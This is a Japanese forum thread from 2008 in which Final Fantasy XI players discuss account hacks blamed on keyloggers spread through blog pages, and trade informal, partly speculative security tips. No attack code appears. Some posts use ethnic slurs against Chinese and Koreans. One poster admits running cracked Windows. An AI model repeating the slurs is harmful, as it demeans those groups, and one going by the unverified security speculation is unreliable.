444 :既にその名前は使われています:2008/03/25(火) 03:28:31.34 ID:gG9qutBm
>>438
両方使って無いね

445 :既にその名前は使われています:2008/03/25(火) 03:29:26.33 ID:vHIgAKgq
>>444
ありがと、俺も対策せんとあかんなこりゃ。

446 :既にその名前は使われています:2008/03/25(火) 03:30:58.82 ID:qu/cuoZy
フリーのソフトでもキーロガー対策の何か入れておいたほうがよさそうだなぁ
なんか今回の件でPCウィルスの怖さを改めて実感した気がする

447 :既にその名前は使われています:2008/03/25(火) 03:31:06.08 ID:QRet0Lrm
>>431
悪いけど、ちょっと興味深いなw

その後ウイルスチェックはしてみた?
もしくは、許可の無いソフトが通信をしようとすると警告してくれるような
ソフトは誰かいれてなかったの?

448 :既にその名前は使われています:2008/03/25(火) 03:31:54.01 ID:PhXDparI
ずっと下げてた…スマソ

FC2のトップだけ見たけど、何の告知も無いね
そもそも使わなくなったけど、お知らせメールだけは届くようにしてるから
何らかの発表があれば、メールでも届くはずだしなぁ…

449 :既にその名前は使われています:2008/03/25(火) 03:32:15.77 ID:/5SLOYFD
仮にパスワードを保存させずに毎回入力する仕様になったとしても
今度はキーロガーを仕掛けてくるようになるだけなんだろうなあ。

450 :既にその名前は使われています:2008/03/25(火) 03:32:59.76 ID:qr3SW834
>>431
>>>438でも聞いてるけど、前にPCでLSコミュニティ使ってた人が
PS2でゲームしてたのに垢ハックされたって報告もあったからそれとは違うのかな?

451 :既にその名前は使われています:2008/03/25(火) 03:33:16.50 ID:1JHdDmwn
>441
ルータにキーロガーすごいですね

452 :既にその名前は使われています:2008/03/25(火) 03:33:40.86 ID:I+pa9CDk
最近垢ハック多すぎないか?
今日の緊急メンテは是非なんらかの対処を・・・


453 :既にその名前は使われています:2008/03/25(火) 03:34:01.37 ID:qr3SW834
ごめ・・・リロードしたら答え書かれてましたorzスルーしてください

454 :既にその名前は使われています:2008/03/25(火) 03:34:47.00 ID:o+wp7W1W
>>443
ハックしたなら、
ルータにインスコされている(と思われる)MUA起動させて送るなり、
直接MTAを送って起動させるなり、
TXTでログ残しといて拾うなりなんでもいいんじゃね?www

いや、俺が知らないだけで、今時はしらんけど、
ルータがSTMP喋るとは思わんよwww

455 :既にその名前は使われています:2008/03/25(火) 03:34:52.55 ID:fAiOj5Ix
>>452
するわけがない。
その確信がボクらとスクエニが長年培ってきた絆

456 :既にその名前は使われています:2008/03/25(火) 03:35:03.66 ID:jq6H0asz
ルーターに仕込まれるというか、PCとPS2を一つのハブ(ルータ)に繋げてログインした場合、
PCにキーロガーが仕込まれていると、ハブ(ルータ)に流れるPS2のパスが抜かれるって所だろう
つーか、FFのログイン認証ってSSL等で暗号化してないんだな
そりゃハックされるわw

457 :既にその名前は使われています:2008/03/25(火) 03:35:12.03 ID:lJNgXUoS
>>437
お前と同じ状態だがウィルスサイト踏みまくったけどなんともないから大丈夫だろw

458 :既にその名前は使われています:2008/03/25(火) 03:38:02.05 ID:czdY66qa
友達にスーパーハカーがいるヤツ湧きすぎ
面白いけどあまり釣りすんなってw

459 :既にその名前は使われています:2008/03/25(火) 03:38:44.82 ID:gG9qutBm
>>447
定期スキャンでトロイが発見されたからOS入れ替えて
FFにログインしたらアイテム全損状態だった
警告してくれるソフト入れてたにも関わらずスルーだったから気づけなかった

460 :既にその名前は使われています:2008/03/25(火) 03:39:49.77 ID:qxJBwIeb
ルーターにキーロガー仕掛ける発想はなかったは

461 :既にその名前は使われています:2008/03/25(火) 03:41:19.79 ID:DxM7+BBt
>>454
MUAだろうがMTAだろうが
個人宅にPOPやSMTPプロトコルしゃべれるルータは無いよねぇ。

せいぜいHTTPやFTPで設定するくらい。

462 :既にその名前は使われています:2008/03/25(火) 03:41:21.85 ID:QRet0Lrm
その警告してくれるソフトは、警告してくれないソフトだと思うw

463 :既にその名前は使われています:2008/03/25(火) 03:47:07.36 ID:gG9qutBm
>>462
AntiVirとAVG+ZoneAlarmって警告してくれるんじゃないのか?

464 :既にその名前は使われています:2008/03/25(火) 03:48:13.96 ID:YeO0sQOu
PS2でハックされた人はLSコミュのパスとログインパスが同じで
それキーロガーに拾われてたりしない?

465 :既にその名前は使われています:2008/03/25(火) 03:49:54.30 ID:LtRgK+Go
かすぺwうぜぇなwwww
オミトロン挟んでる環境なのに強制的にIEで鯖にパッチ取りに行きやがる
しかもセッション細切れにするから一々FWのアラート出てうざい
パッチ落としきるまで何回許可クリックさせるつもりだこれ

※IEを直でスルーさせるつもりは毛頭ございません、市ねかすぺ

466 :既にその名前は使われています:2008/03/25(火) 03:51:50.35 ID:DxM7+BBt
>>465
設定をみなおそうよ

467 :既にその名前は使われています:2008/03/25(火) 03:54:02.30 ID:rvQA3x19
よく考えたら、カスペだけスキャンできるのもおかしいよなあ。

何か裏が・・・!

468 :既にその名前は使われています:2008/03/25(火) 03:57:06.11 ID:czdY66qa
>>456
リピータハブ内蔵のブロードバンドルータって珍しくない?
あと、ログイン認証はMD5使ったchallenge & responseに見えるよ
ログイン後のPOLコンテンツもダイジェスト認証のようだからやっぱりC&R

469 :既にその名前は使われています:2008/03/25(火) 03:57:13.16 ID:LtRgK+Go
なぜかかすぺの鯖がLive2chを叩き始めた
なんぞこれ

>>465
こういうのをスルーするような設定はセキュリティ的によろしくない

470 :既にその名前は使われています:2008/03/25(火) 04:00:50.04 ID:hKaE50zj
なんかもう面倒になってきたからFC2のドメインをブラックリストにいれてみた。
どれだけ予防してても踏んだらひっかかりそうだし
そもそもブログなんてそんなみねーし(´・ω・`)

471 :既にその名前は使われています:2008/03/25(火) 04:01:59.63 ID:rNeX04xY
>>467
新種のウイルスが登場した時に〜のソフトだけ動きが速くしばらく対応ってのはよく
あるよ。

472 :既にその名前は使われています:2008/03/25(火) 04:03:30.70 ID:rvQA3x19
新種というより亜種だよね

473 :既にその名前は使われています:2008/03/25(火) 04:06:46.09 ID:CPKgTWTl
業者対策とは全く関係ないバージョンアップだった。
http://www.playonline.com/ff11/polnews/news12894.shtml

474 :既にその名前は使われています:2008/03/25(火) 04:13:22.67 ID:XVxvaSh9
もう業者じゃなくて奴らのことは犯罪者でいいだろう。



475 :既にその名前は使われています:2008/03/25(火) 04:14:37.98 ID:rNeX04xY
■コンフリクト(PvP)において、侍のウェポンスキル「石火之機」
 の効果を調整しました。

自分の作ってるゲームのアビすらわからん連中に期待しない方がいいかもなぁ。

476 :既にその名前は使われています:2008/03/25(火) 04:18:50.22 ID:DxM7+BBt
>>475
誤爆かな?

スクエニはスクエニ。ここはここ。
要望は送るけれど、自分たちで身を守る術を身に着けるのだ。

477 :既にその名前は使われています:2008/03/25(火) 04:20:20.45 ID:fAiOj5Ix
>>473に宛てたレスじゃね?

478 :既にその名前は使われています:2008/03/25(火) 04:21:24.24 ID:DxM7+BBt
あぁ、なるほど

479 :既にその名前は使われています:2008/03/25(火) 04:21:49.13 ID:xwSNSLwB
>>434
ありがとう、静観することにするよ。
パスワードファイル抜かれても、それだけじゃ他人にログインされない
多重の対策をスクエニがしてくれるのを静かに祈る。

480 :既にその名前は使われています:2008/03/25(火) 04:24:10.01 ID:Gcfn1S+u
黒猫見たいんだがなー
怖くて見れないわ
あそこはかなりソロ参考になるから閉鎖はしとほしくないな…


481 :既にその名前は使われています:2008/03/25(火) 04:34:10.63 ID:jonVo59q
俺のリアルフレに、FFプレイヤーじゃないんだが
常駐の付加が嫌だとセキュリティ対策しない奴がいる
なにを言ってもむだ
見つけたら削除してるから別に平気とか抜かす

こういうやつが踏み台になって攻撃してると思うと豆腐の角に頭ぶつけて死ねと思ってしまう

482 :既にその名前は使われています:2008/03/25(火) 04:41:03.82 ID:qr3SW834
バハ鯖、メンテ前に垢ハックされたキャラがまたインしてアイテムと戦績の処分しだしてる
現在は白門の貨幣交換の前にいるみたい

483 :既にその名前は使われています:2008/03/25(火) 04:41:23.06 ID:yIiyHr+s
一通りスキャンし終えてから、パスワード15桁にして
保存しないようにすれば大丈夫かな?

484 :既にその名前は使われています:2008/03/25(火) 04:44:15.39 ID:DxM7+BBt
>>483
何が入れられたかにもよりますが、OSインストしなおしたほうが良いのではないでしょうか。

485 :既にその名前は使われています:2008/03/25(火) 04:44:50.94 ID:wc2s+Fxx
何度も言われてるけど、根本のシステムに馬鹿でかい穴がある以上は「大丈夫」なんてことは絶対に無い。

486 :既にその名前は使われています:2008/03/25(火) 04:51:40.80 ID:PhXDparI
あのさぁ、まーたログインできなくなってんだけど
自分の設定するPOLのパスワードがおかしいのかね

別に垢ハック受けてる訳ではなさそうなんだが、ログインできなくなる
パスを間違ってるなんて有り得ないんだが…どうなってるんだコレ

487 :既にその名前は使われています:2008/03/25(火) 04:52:30.36 ID:LtRgK+Go
本当に心配なら罰箱かPS2かPS3の60Gでも買って移行するとかしとけ
PCのままにするなら必要な物はバックアップしたあとOSごと入れなおした方が無難

>>486
中華が物色中じゃねーの

488 :既にその名前は使われています:2008/03/25(火) 04:54:08.60 ID:DxM7+BBt
>>486
垢ハック受けてない自信があるのならいいけれど、
大文字小文字全角半角をちゃんと確認しましたか?

489 :既にその名前は使われています:2008/03/25(火) 05:01:44.40 ID:PhXDparI
>>486-487
前も同じ事があって、垢ハックの可能性もあるから
OS毎再インスコしたし、パスも間違ってない
↑スクエニに問い合わせた時に仮パス貰って即変更した

まさか、特定のパターンのパスはバグるとか無いよな…

490 :既にその名前は使われています:2008/03/25(火) 05:02:57.51 ID:rvQA3x19
そもそも二重ログインできることがおかしいんだよな。
どんだけ馬鹿なんだか

491 :既にその名前は使われています:2008/03/25(火) 05:14:39.76 ID:PhXDparI
レス番付け間違えてるや…>>487-488さんレスどうもね
またサポセン凸して、今度はパスの設定状況どうなってるか聞いてみる
昨日の今日でまた問い合わせなんて、やってらんねー

つか、土曜日に出したメールも放置だったし、どうなってんだかサッパリ分からん

492 :既にその名前は使われています:2008/03/25(火) 05:15:58.50 ID:DxM7+BBt
>>489
スクエニに問い合わせて再度パスを発行してもらってその後変更。
変更後のID・パスも大文字小文字等完全に入力ミスが無いなら
キーボードを疑ってみるというのもひとつの手です。

それ以外はわからないや。すいません。
今日は平日だからスクエニに聞くしかないかもです。

493 :既にその名前は使われています:2008/03/25(火) 05:23:44.66 ID:LtRgK+Go
>>491
>>123はパス変更の履歴は確認できてるみたいだから、まずそれで調べてみたら
同時ログインでバッティングしてなければログインできない場合はパス変更されてる時
だと思う
あとはセキュリティきつくしすぎてPOL鯖との通信がしっかり出来ていない場合も考えられる
FWを入れた場合は、TCPのOUTとUDPの双方向のPOL鯖への通信が許可されてるか
調べてみてくれ
細かくルール設定したい場合は鯖アドレス群が3つがあるから範囲はJPNICで調べてね

494 :既にその名前は使われています:2008/03/25(火) 05:29:12.55 ID:DxM7+BBt
>>493
あー、そっかOSインストールしなおしなら
WindowsデフォルトのFWではじかれる可能性もありますね。

一個一個外しながら試してください>>491さん

495 :既にその名前は使われています:2008/03/25(火) 05:41:06.90 ID:PhXDparI
>>493-494
FWは、何度も設定解除しつつ確かめたけど問題無さそう
パスが違うと出て、どうにもならない…
>>123さんのようにログインできるようになったら履歴見てみる

たんに自分の打ち間違いと思いつつ、とりあえず寝る\(^o^)/

496 :既にその名前は使われています:2008/03/25(火) 05:44:14.24 ID:wU4wL3FZ
>>495
寝たかな
メモ帳ひらいてパス打ってコピペしてみるといい


497 :既にその名前は使われています:2008/03/25(火) 06:46:58.20 ID:/DG1q5Vn
ずっとFFロギンしてればいいんじゃね?

498 :既にその名前は使われています:2008/03/25(火) 06:52:47.94 ID:cH7gyrCH
アカハックとかされるのは

元をただせば RMTで金になるからなんだよな
誰もかわなかったらアカハックされるわけがない
金にならないからな

499 :既にその名前は使われています:2008/03/25(火) 07:02:11.71 ID:rCq1aPP7
>>497
POLは何故か後からログインが優先されるはず
コレって何故なんやろ

500 :既にその名前は使われています:2008/03/25(火) 07:02:32.03 ID:NxOTbSzI
>>264
これと全く同じ構成でパス抜かれた俺。
結局対処しようがないんだよな。
FF引退できたから良いことちゃいいことだが。


501 :既にその名前は使われています:2008/03/25(火) 07:05:07.20 ID:YgFIpP6m
おいおいこわくて2ちゃんしか見れねえよw

502 :既にその名前は使われています:2008/03/25(火) 07:08:25.03 ID:5CNURpEQ
>>499
おかしいよな〜・・・
FFは回線切断後に即再ログインするとすでにログインしてるだの言われてけられるというのに。


503 :既にその名前は使われています:2008/03/25(火) 07:09:43.51 ID:YgFIpP6m
システムがクソと言われる所以じゃね
しらねえけど

504 :既にその名前は使われています:2008/03/25(火) 07:11:34.95 ID:bp4N7Sb+
>>500
結局IEがガンなのかねえ・・。
Sleipnirも結局はIEのエンジン使ってるんだっけ?

505 :既にその名前は使われています:2008/03/25(火) 07:33:38.12 ID:1Scke0MT
>>264
>SleipnirのレンダリングエンジンにIE使ってたら何も変わらんけどなw

>>276
装備倉庫から1ジョブ分総入れ替え、薬品倉庫からがっつりできなくなるなw

>>277
何の解決にもならんよ。不正アクセスされることが前提じゃん。
対策すべきは、MACアドレスまたはIPアドレス、その他も加えた認証に入れないとな。

>>291
>>279

>>304
いい対応案だね。いっそMACアドレス認証もありかなって思うね。もう

>>321
残念。電子データの持ち主はユーザじゃなくてサービスプロバイダだ。
さらに不正アクセスされたのもサービスプロバイダだ。
ユーザは被害届すらだせんよ。

506 :既にその名前は使われています:2008/03/25(火) 07:43:49.61 ID:5K38i1Dh
>>502
FFは先出し優先、POLは後出し優先、という謎仕様だったりして
FFにログインするにはPOLにログインしないといけないので、先出し優先処理が無駄に

507 :既にその名前は使われています:2008/03/25(火) 07:53:00.17 ID:WT1MZrdK
狡猾な中国人に鉄槌を

508 :既にその名前は使われています:2008/03/25(火) 07:55:35.57 ID:bp4N7Sb+
>>507
なぜか、かつてマフィア(Mafia)の語源の一つと言われてた「Morte alla Francia Italia anela!」

これ思い出した。


509 :280:2008/03/25(火) 07:57:28.06 ID:mx3cOLzk
さっき起きた。
GMコール開始。
フレのアカウント、鯖移動させられてたよ・・・ひどすぎる

510 :既にその名前は使われています:2008/03/25(火) 07:58:08.82 ID:bp4N7Sb+
>>509
ひどいな・・・・。
仲間が・・・仲間が・・・。
ひどいな・・・。

511 :既にその名前は使われています:2008/03/25(火) 08:02:06.63 ID:WT1MZrdK
自分も垢ハックされたフレのキャラがどうなってるか気になる

280さんお疲れさま、これからも逐次経過報告お願いします

512 :既にその名前は使われています:2008/03/25(火) 08:03:11.35 ID:nkc48CPC
授業料だと思うしかないな。。。
これでセキュリティをしっかり意識することになるだろう。

513 :既にその名前は使われています:2008/03/25(火) 08:05:44.11 ID:cH7gyrCH
ゲームでよかったな
現実で金盗難よりはるかにマシだな

514 :既にその名前は使われています:2008/03/25(火) 08:05:49.15 ID:gtQCsYDw
あやしいURLは踏まない、で避けられないからな。
暗号化したURLしこんでたり素人目には何が何だか…

515 :既にその名前は使われています:2008/03/25(火) 08:06:34.10 ID:NDcMsGSZ
>>513
そっちの方が色々とやれるだけましな気もするがな

516 :既にその名前は使われています:2008/03/25(火) 08:07:44.85 ID:cH7gyrCH
対策として、今使ってるプロバイダ以外のアクセスははじくとかしないといかんかもしれんね

517 :既にその名前は使われています:2008/03/25(火) 08:07:47.45 ID:tbTqVBho
個人情報の漏洩、それに対するずさんな対処と管理って事で□eの事をどこかに通報いたほうがいいのかね?

518 :既にその名前は使われています:2008/03/25(火) 08:08:18.43 ID:bp4N7Sb+
>>515
だなあ、警察もちゃんと動きそうだが・・・。


519 :既にその名前は使われています:2008/03/25(火) 08:11:49.28 ID:1Scke0MT
>>333
解除できちゃダメでしょ。解除できた時点でフリーハンドじゃん。

>>338,353
ID/pwに頼ってたら同じになっちゃうから、生体認証かハード縛りいるねぇ

>>339,395
ふと思ったんだが、BLOG持ちやWEBページ持ち多いじゃないか。
ここでバッジ作って各自のに張り付けて、SSTの意見メールフォームにリンクするのは
どうかいね?
Stop! RMTみたいに
ttp://www.stop-rmt.com/

>>373
なんでいちいち分散させたがるんだ? 逆効果が目的じゃないかとを勘ぐりたくなるぞ

>>403
PG2はマウルェア駆除してくれね〜ぞ、と

520 :280:2008/03/25(火) 08:12:04.07 ID:mx3cOLzk
>>513
鯖移動だとお金かかるから、盗難みたいなもんだよ。
本人なにもしてないのに、みぐるみはがされて鯖移動手数料まで持ってかれるんだ。


521 :既にその名前は使われています:2008/03/25(火) 08:17:07.70 ID:n+/0QQNY
ハックされたやつはハックされる前までのセキュリティ状況をもう少し詳しく書いてほしいな

・アンチウィルスソフトの名前
・定義ファイルは普段から更新していたのか
・ブラウザとブラウザのバージョン
・OS
・WindowsUpdateは普段から最新版にしていたのか
・パス抜きが仕込まれていたと思われるブログを閲覧した時間帯と、業者にログインされて強制的に落とされた時間帯の明記

522 :既にその名前は使われています:2008/03/25(火) 08:23:58.46 ID:qlyvOiMi
>>517
アホか

それが出来るとすれば□が管理する場所において漏洩とか起きてなきゃ無理

523 :既にその名前は使われています:2008/03/25(火) 08:42:31.11 ID:ymC/GTmn
犯罪にあって勉強になったとか
そんなんだから相手がナメられんだよ
自分のためにも、これから犯罪にあうかも知れない人のためにも
毅然と戦え、立ち向かえ

524 :既にその名前は使われています:2008/03/25(火) 08:43:42.00 ID:tbTqVBho
>>522
POLインすれば個人情報丸見えなのに□の管理関係ないのか?

525 :既にその名前は使われています:2008/03/25(火) 08:44:57.73 ID:fR9STV/f
>>524
デバッグもユーザー頼りなスクエニだから、
POLにインした時点でハックされる可能性も完全同意+自己責任って方針なんじゃね?

526 :既にその名前は使われています:2008/03/25(火) 08:45:44.76 ID:cH7gyrCH
>>523
で?警察、スクエニに連絡スル以外の方法をかけよ

527 :既にその名前は使われています:2008/03/25(火) 08:46:37.85 ID:tbTqVBho
あとハックされた後の対処さ
「もう1つアカ用意してログイン後通報しないと対応できない」

おかしいだろこれ

528 :既にその名前は使われています:2008/03/25(火) 08:50:32.95 ID:GO6bIFih
>>489
つか、そんなに気になるなら
POLのサービスの履歴見て自分でパス変更かけてない時期にパス変更あったかどうか見ろと

529 :既にその名前は使われています:2008/03/25(火) 08:51:19.50 ID:Q74sBmBw
>>517は現金とられたらの話をしてるだけだろ

530 :280:2008/03/25(火) 08:53:01.77 ID:mx3cOLzk
GMと話はしたが、
・インフォメーションセンターに本人が連絡しろ
・アカウントの管理は個人の責任
 被害にあわないための対策も公式サイトに載ってるから、それを見ろ

と、本人じゃないので全く聞く耳持たず。
まぁ、俺がGMでも同じ対応すると思うが。

とりあえず、対策をしていても新しい手法が次々と出てきていて、被害に会う人が続々出てきていること、なにか対策を考えてほしいこと
インフォメーションセンターの24時間対応化などを要望しておきました。

要望したら、要望はフォームからしてくれと言われたが(´_ゝ`)

フレのアカウントは別鯖表示のままだ。
なにやってるか知らないけど、ホントムカついて涙出てくる。
何もできないのが悔しい。

531 :既にその名前は使われています:2008/03/25(火) 08:58:05.44 ID:CJuWmpLQ
>>519
プラチナリボン張ってるFFブログもそんなに数ないよなー
発信元のROと比べてるからそう感じるだけかも知れないけど。

532 :既にその名前は使われています:2008/03/25(火) 08:58:40.91 ID:EH31oboY
>>530
仮にそれ認めたらHNMLSで張り込み時に落とし合い可能になるじゃねぇ、バカじゃねぇのw
ライバルLSのリーダーのフレですが中身中華ですから落としてくださいとか?
ま、たかがゲームで営業日営業時間に直接電話してこいなんて無職ニートでもなきゃ
無理だしそこは24時間対応して欲しいけどね。

常識的に考えてDupeやExploitやCheatに転用されそうな事をするわけがないだろ。


533 :既にその名前は使われています:2008/03/25(火) 09:01:23.03 ID:mjgaBnF1
>500
dda3■net、hellh■net
この辺ってアメリカの鯖みたいだしPG2で遮断できないみたいよ
ノートンはザルと何度もry

534 :既にその名前は使われています:2008/03/25(火) 09:04:56.80 ID:U5OFwJAr
なんだかここ数日の書き込みがすごいな。
つまり垢ハックも多数発生してるのか。
俺は知り合いがハックされてからここに来ているが、
だんだん巧妙化してきてるな。

あと、お前等に質問。
業者キャラには一定の名前が冠でつけられてないか?
垢ハックされてその商品を出品するなりバザーするんだが
例えばバハ鯖なら
Ba○○○もしくはBah○○○
おでんならOd○○○もしくはOdi○○○
というように。競売出品されたものは止められないが
バザーならある程度の認知で止められるんじゃないかと
思っただけなんだけどな。


535 :既にその名前は使われています:2008/03/25(火) 09:05:15.23 ID:qlyvOiMi
>>524
□がIDとパス漏洩してってならまだしも、それ以外の状況でPOLに勝手にinされる
としたらユーザーサイドでの管理上の問題だってあり得るだろ

□が全く悪くないとは言わないが何でもかんでも□の責任にすりゃいいって言うものでもない

536 :既にその名前は使われています:2008/03/25(火) 09:06:48.67 ID:cH7gyrCH
>>534
かうなといっても安かったらNAがかったりするから意味がない

537 :既にその名前は使われています:2008/03/25(火) 09:07:28.39 ID:FdVfr1o9
アドバイスください。
昨日深夜知り合いのブログアクセスした直後URLみてfc2なのに気づき、
あわててブラウザ落としてこのスレみてカスペルのInternet Security ダウンロードしてインスコ→アップデート。
PCのLAN抜いてInternet Securityでセキュリティレベル高で完全スキャン。
平行してPS2でログインしてPC用垢のパスワード変更。
スキャンしかけたまま寝て起きたら、脅威なし、になってました。
これは運よくハックには引っかからなかったということでしょうか?
あと、何かしたほうがいいことがあれば夜やろうと思うので教えてください。

538 :既にその名前は使われています:2008/03/25(火) 09:10:19.83 ID:ymC/GTmn
スクエニに電話して聞いてみ?
これだこしたら大丈夫ですかって
煽りじゃなくて、まじでさ

539 :280:2008/03/25(火) 09:11:46.36 ID:mx3cOLzk
>>532
うん、それはそうだね。
ただ、被害にあってる人がリアルタイムでいるよと運営側に伝えたかっただけなんだ。


24時間対応はしてほしいよなぁ。
本人アクセスしてないの分かってるのに、目の前にそいつのキャラがいて、運営にリアルタイムで連絡できる手段がないのはかなり痛い。
やられ放題だからな。

540 :既にその名前は使われています:2008/03/25(火) 09:12:00.37 ID:n+/0QQNY
>>537
FC2だからって問答無用でウィルスに感染するわけじゃないぞ

541 :既にその名前は使われています:2008/03/25(火) 09:13:08.99 ID:Yn5RmBrH
>>537
しらんがな

現状「ログインできなくて感染に気づく」だしなぁ
FC2だからって全部じゃないぞ!その知り合いのアドレスでも貼ってみてくれ

>あと、何かしたほうがいいことがあれば夜やろうと思うので教えてください。
押入れの掃除

542 :既にその名前は使われています:2008/03/25(火) 09:15:02.73 ID:tbTqVBho
>>535
ハックされた者の現状の対処についてどう思うよ

GM「本人がインして報告してください」

これも2アカ持ってない本人が悪いですかそうですか

543 :既にその名前は使われています:2008/03/25(火) 09:15:11.41 ID:BTWfPp0b
>>537
FC2全てのブログがウィルスをばら撒いている訳ではない

544 :既にその名前は使われています:2008/03/25(火) 09:17:28.35 ID:+BGb3nuS
>>537
ログインパスワード変更とオートログイン解除しとけ

FC2ブログが全部が全部罠まいてる訳じゃないからそのビビり具合は酷いが
安全っつー保証もないしな

545 :既にその名前は使われています:2008/03/25(火) 09:22:42.28 ID:4rU7fOzS
中途半端な知識な奴の情報が乱れ飛んでるな
興味あるのが>>431のケース

・フレンドリスト+のようにPS2以外でPOLパスワードを入力したことがあるか
 今は使って無くても残っていたらアウト、アンインストールで完全に消せているか未確認
・漫画喫茶等でFFをプレイしたことがないか
 今騒いでるハッキング手口とは別のキーロガーを仕込まれている可能性がある
・単純なパスワードに変更していないか
 総当たりや辞書ですぐに当たるパスワードならアウト

でもなんか ID:gG9qutBmの発言おかしいなw


546 :537:2008/03/25(火) 09:26:44.34 ID:FdVfr1o9
アドレスはackyff11.blog25.fc2.comです(宣伝乙とかいわないで・・・)。
これから先は対策をするとしても、現時点で自分のPCが大丈夫なのかどうか、
調べるすべはないんでしょうか?

547 :既にその名前は使われています:2008/03/25(火) 09:26:44.22 ID:ymC/GTmn
>>542
ブラックジョークにしかならんな

548 :hoge:2008/03/25(火) 09:27:40.25 ID:G+s+oZhz
みんな〜こんなあびねーゲーム引退しちゃえよぉう、、、
そう引退した時レモラ鯖の俺にギルわたしにくるよぉうに
、、、うぇうぇおおう、、

549 :既にその名前は使われています:2008/03/25(火) 09:30:04.35 ID:sGs0zFvT
このゲームをやると個人情報を抜かれると広まるゲームは末期症状。
4亀かで言われてたが、本当に末期臭漂ってるよな。
中華に名前住所なんか知られたくねー!女性なんかとくにだろうに…。
なんかリアル事件の原因になってからじゃおせぇのに。

550 :既にその名前は使われています:2008/03/25(火) 09:35:00.81 ID:+BGb3nuS
ハックされたプレイヤーの登録住所にチョンが強盗殺人とか多発しそうで嫌だたな

551 :既にその名前は使われています:2008/03/25(火) 09:36:10.13 ID:+C1prF/7
垢ハックは■も対策に限界があるだろうしな・・・
ユーザー側の問題もあるし
が、せめてそうなった時に迅速な対応が出来るようには流石にして欲しいよ
自分で入れないのに本人がインして連絡してくださいってアホか・・・

登録してる住所に直に緊急時にアカを凍結できるパスとか送ってもらって、
それで自分で何とかできるようにとかならんかねー

552 :既にその名前は使われています:2008/03/25(火) 09:42:38.35 ID:49rjbgT+
韓国のリネージュですら対策と告知してるのに
国産のFFは完全にスルーだもんなあ
ただでさえ末期でフレが居るから続けてるのに
フレ居なくなれば引退する人増えるのが■eにはわからんのかねえ

553 :既にその名前は使われています:2008/03/25(火) 09:46:35.75 ID:+C1prF/7
> 139 名前: 既にその名前は使われています 投稿日: 2008/03/25(火) 09:42:51.34 ID:kWaFMAAa
> 北米サイトの垢ハック救済宣言
> http://www.playonline.com/ff11us/polnews/news12495.shtml
>
> 日本人は舐められてるんだよ

なんだこりゃ('A`)

554 :既にその名前は使われています:2008/03/25(火) 09:46:47.90 ID:ULE77qbQ

自作マシン複数台持ってて、OS(XP)はコピー+キージェネ生成プロダクトキーでずっと
使ってたんだけれど、
(だって実機はもとより仮想マシンとか入れてるといちいち全部買うのもアレだし認証
するの面倒なんだもん・・・(言い訳)
いつからかアクティベーションが厳しくなって、WindowsUpdateとができなくなった。
1年ぐらい前からIEやWMPもアップデートできない状態だったけれど、
そんなわけで何ヶ月か、最新ではない状態で使ってるわけだけれど、これって危ないで
すか?

セキュリティーツール(ウィルス対策・スパイウェア対策・FW・PG2)は大体ぬかりな
く入れていても、危ないですか?
今のところハックはされてないんだけど・・・
早急にどうにかしたほうがいいですかね?

というかこのままでもWindowsUpdateする方法ってありますかね?



555 :既にその名前は使われています:2008/03/25(火) 09:47:52.30 ID:ymC/GTmn
いくらなんでも分かってるだろうな
そのケツを叩くしかない

556 :既にその名前は使われています:2008/03/25(火) 09:48:32.74 ID:+C1prF/7
>>554
('A`)ハイハイ スゴイスゴイ ガンバッテ

557 :既にその名前は使われています:2008/03/25(火) 09:48:56.86 ID:ugsz64L4
そもそもRMTでギル買う馬鹿が居なかったらこんな事起きないんだよな

RMTerマジで死ね

558 :既にその名前は使われています:2008/03/25(火) 09:49:34.99 ID:+C1prF/7
>>557
('A`)同意だ。

559 :既にその名前は使われています:2008/03/25(火) 09:50:36.52 ID:gwiQ2FCi
/yes >>557

560 :既にその名前は使われています:2008/03/25(火) 09:51:16.36 ID:sGs0zFvT
せめて■はこれから買い手は一発BANというだけでかなり効果あるだろうに。

561 :既にその名前は使われています:2008/03/25(火) 09:51:49.52 ID:Ev13MfKv
とりあえずPOLでログイン時に注意喚起すべき

562 :既にその名前は使われています:2008/03/25(火) 09:52:00.78 ID:U5OFwJAr
>>554
そんなお前さんの事情は知らん。
ヤフオクでプロダクトキー買えば?

563 :既にその名前は使われています:2008/03/25(火) 09:52:52.91 ID:cH7gyrCH
>>554
ワレザー死ね
クズが

564 :既にその名前は使われています:2008/03/25(火) 09:53:24.24 ID:k7bWJxpA
>>561
なんでそんな簡単な事すらしないんだろうな?
イメージが悪くなる?毒餃子の馬鹿シナ畜とやってる事は一緒だよな糞■eは

565 :既にその名前は使われています:2008/03/25(火) 09:53:45.83 ID:qlyvOiMi
>>542
他人の申告で隔離がぽこぽこ出来る方がおかしいだろう普通に考えれば
2垢ならより早く対応できるが、公式で推奨してるわけでもない

本人確認が出来ない以上対応できないなんてのは世間一般の
他のサービスでもごく普通のことだし

当たり散らすだけならガキでもできるし、もうちっと考えろ

>>552
対策はともかく告知してる内容は結局、自分で管理をしっかりしてくださいだけどな
リネも



566 :既にその名前は使われています:2008/03/25(火) 09:56:10.58 ID:1JHdDmwn
クズエニと業者は癒着してるだろ。業者の稼ぎを全部潰さず、
小出しに潰して、そして次の稼ぎを用意してるしな。業者のアカウント代は
相当儲かるんだろうな。

567 :既にその名前は使われています:2008/03/25(火) 09:57:57.25 ID:24T8aigI
>>565
もうちっと考えるのは■だろ
本人がイン出来ないのに本人がインして報告ってなんだ?
土日休みで17時まで?しか電話対応も無理って・・・
業者に土日か17時以降に盗んでくださいね^^って教えてるような物じゃないか・・・

568 :既にその名前は使われています:2008/03/25(火) 10:01:02.59 ID:sGs0zFvT
そして実際その時間にハックされてる訳だからな…。

569 :既にその名前は使われています:2008/03/25(火) 10:02:52.27 ID:RlorLQiV
>>565
サポセンが24時間電話受付しているのなら君の言ってる事も尤もなんだがな

570 :既にその名前は使われています:2008/03/25(火) 10:02:52.67 ID:qlyvOiMi
>>553
なめてるも何も、ハックされたならとにかく早くサポセンに連絡しろ
完全に元の状態に出来ないかもしれないが、出来るだけ早く連絡をくれれば
アカウントを取り返しアイテムを取り戻すための手助けが出来るかもしれない
だから気づいたらすぐサポセンに連絡しろ

この程度のことしか書いてねーよ

571 :既にその名前は使われています:2008/03/25(火) 10:04:11.71 ID:Bcwt/Dfb
     )、._人_人__,.イ.、._人_人_人
   <´ リ デ ィ ル 返 し て っ !>
    ⌒ v'⌒ヽr -、_  ,r v'⌒ヽr ' ⌒
// // ///:: <   _,ノ`' 、ヽ、_ ノ  ;;;ヽ  //
///// /::::   (y○')`ヽ) ( ´(y○')    ;;|  /
// //,|:::     ( ( /    ヽ) )+     ;| /
/ // |:::     +  ) )|~ ̄ ̄~.|( (       ;;;|// ////
/// :|::       ( (||||! i: |||! !| |) )      ;;;|// ///
